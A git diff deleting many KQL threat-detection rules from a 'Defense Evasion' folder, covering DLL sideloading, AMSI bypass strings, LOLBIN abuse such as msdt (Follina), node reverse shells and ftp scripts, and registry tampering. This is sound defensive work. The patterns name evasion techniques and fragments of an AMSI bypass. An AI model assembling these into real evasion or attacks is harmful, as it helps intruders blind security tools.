-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_7za.DLL_Sideloading.kql b/Defense Evasion/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Defense Evasion/Potential_7za.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql b/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql
deleted file mode 100644
index 2ac0c70c..00000000
--- a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/04
-// Level: medium
-// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql b/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql
deleted file mode 100644
index 59588cc9..00000000
--- a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @Kostastsale
-// Date: 2018/08/17
-// Level: high
-// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" or ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql b/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql
deleted file mode 100644
index 8dc88184..00000000
--- a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/04
-// Level: high
-// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql b/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql
deleted file mode 100644
index e192e978..00000000
--- a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "AVKkid.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql b/Defense Evasion/Potential_Adplus.EXE_Abuse.kql
deleted file mode 100644
index 680e85fa..00000000
--- a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: high
-// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
-// Tags: attack.defense_evasion, attack.execution, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql b/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql b/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql
deleted file mode 100644
index 9fb59ef2..00000000
--- a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
-Attackers might abuse this in order to bypass application whitelisting.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql b/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql
deleted file mode 100644
index 3a7f1b22..00000000
--- a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql
deleted file mode 100644
index 8bb69102..00000000
--- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/29
-// Level: high
-// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
deleted file mode 100644
index 4d1541c8..00000000
--- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql b/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql
deleted file mode 100644
index 634eadc3..00000000
--- a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql
deleted file mode 100644
index 2fb5e04e..00000000
--- a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2022/05/17
-// Level: high
-// Description: Detects potential arbitrary file download using a Microsoft Office application
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
deleted file mode 100644
index 4d75232f..00000000
--- a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/03
-// Level: medium
-// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql
deleted file mode 100644
index e9726a4d..00000000
--- a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql
deleted file mode 100644
index 9a5ab3b6..00000000
--- a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql b/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql
deleted file mode 100644
index e86a83a1..00000000
--- a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where (RegistryKey contains "\\System\\CurrentControlSet\\Control\\WMI\\Autologger" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql b/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql
deleted file mode 100644
index 49da9307..00000000
--- a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/07/15
-// Level: low
-// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-An attacker can use this to authenticate to Azure AD in a browser as that user.
-
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql
deleted file mode 100644
index e33493d3..00000000
--- a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith 
"\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith 
"\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or 
FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
deleted file mode 100644
index 17de2322..00000000
--- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
-// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql
deleted file mode 100644
index 0a63b246..00000000
--- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
